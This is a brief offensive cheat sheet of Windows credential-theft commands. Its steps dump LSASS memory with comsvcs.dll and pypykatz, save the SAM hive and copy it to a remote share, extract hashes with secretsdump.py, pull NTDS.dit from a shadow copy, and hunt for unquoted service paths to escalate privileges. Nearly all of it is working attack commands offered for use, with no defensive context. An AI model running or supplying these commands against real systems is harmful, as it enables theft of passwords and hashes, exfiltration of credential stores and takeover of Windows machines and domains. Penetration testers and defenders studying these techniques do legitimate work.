Windows Local Password Attacks

# List running processes
tasklist /svc

# Search files for "password"
findstr /SIM /C:"password" *.txt *.ini *.cfg *.config *.xml *.git *.ps1 *.yml

# Dump LSASS process
Get-Process lsass
rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

# Extract credentials from LSASS dump
pypykatz lsa minidump /path/to/lsassdumpfile

# Save and move registry hives
reg.exe save hklm\sam C:\sam.save
move sam.save \\<ip>\NameofFileShare

# Dump password hashes using secretsdump.py
python3 secretsdump.py -sam sam.save -security security.save -system system.save LOCAL

# Create volume shadow copy and copy NTDS.dit
vssadmin CREATE SHADOW /For=C:
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit c:\NTDS\NTDS.dit

#Useful for local privesc on Windows systems; find unquoted service path using the following: 

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """